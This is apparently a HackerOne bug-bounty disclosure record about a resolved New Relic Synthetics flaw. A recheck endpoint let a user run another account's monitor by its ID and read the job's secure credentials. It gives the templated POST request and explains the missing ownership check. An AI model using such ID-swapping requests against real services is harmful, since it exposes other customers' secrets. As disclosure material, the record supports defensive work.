ID H1:787886
Type hackerone
Reporter skavans
Modified 2020-08-13T13:45:22
Description
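@skavans identified an endpoint for testing Synthetics monitors. Without proper validation, a user who knew the ID of a monitor belonging to another account could run that monitor on their own account; per the report title, they could then also read the content of the resulting job, including secure credential values. The underlying issue is a missing object-level authorization check: the server should verify that the monitor referenced by `monitorId` belongs to the account named in the request before running it, rather than relying on the ID being hard to guess. The request in question: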
```
POST /accounts/<ACCOUNT ID>/monitors/monitor/recheck.json?monitorId=<MONITOR_ID> HTTP/1.1
Host: synthetics.newrelic.com
...

{"monitorId":"<MONITOR_ID>","location":"AWS_AP_SOUTHEAST_1","accountId":<ACCOUNT ID>}
```
{"id": "H1:787886", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "New Relic: Ability to run monitors' jobs of other accounts and to read these jobs content (including the secure credentials values)", "description": "@skavans identified an endpoint for testing Synthetics monitors. Without proper validation, this could allow monitors from other accounts to run on your account with knowledge of the monitor's ID:\n\n```\nPOST /accounts/<ACCOUNT ID>/monitors/monitor/recheck.json?monitorId=<MONITOR_ID> HTTP/1.1\nHost: synthetics.newrelic.com\n...\n\n{\"monitorId\":\"<MONITOR_ID>\",\"location\":\"AWS_AP_SOUTHEAST_1\",\"accountId\":<ACCOUNT ID>}\n```", "published": "2020-02-02T21:50:29", "modified": "2020-08-13T13:45:22", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/787886", "reporter": "skavans", "references": [], "cvelist": [], "lastseen": "2020-08-13T14:53:43", "viewCount": 0, "enchantments": {"dependencies": {"references": [], "modified": "2020-08-13T14:53:43", "rev": 2}, "score": {"value": 3.9, "vector": "NONE", "modified": "2020-08-13T14:53:43", "rev": 2}, "vulnersScore": 3.9}, "bounty": 2500.0, "bountyState": "resolved", "h1team": {"url": "https://hackerone.com/newrelic", "handle": "newrelic", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/017/011/eba06abb23bd6c9c7d719ddafb9fa83bd2d66aaa_original./3afcb5c896247e7ee8ada31b1c1eb8657e22241f911093acfe4ec7e97a3a959a", "medium": "https://profile-photos.hackerone-user-content.com/variants/000/017/011/eba06abb23bd6c9c7d719ddafb9fa83bd2d66aaa_original./eb31823a4cc9f6b6bb4db930ffdf512533928a68a4255fb50a83180281a60da5"}}, "h1reporter": {"disabled": false, "username": "skavans", "url": "/skavans", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/014/089/00a08f6b566bcdfe82b2f0be62bdde605a030823_original.jpg/3afcb5c896247e7ee8ada31b1c1eb8657e22241f911093acfe4ec7e97a3a959a"}, 
"is_me?": false, "cleared": true, "hackerone_triager": false, "hacker_mediation": false}}
{}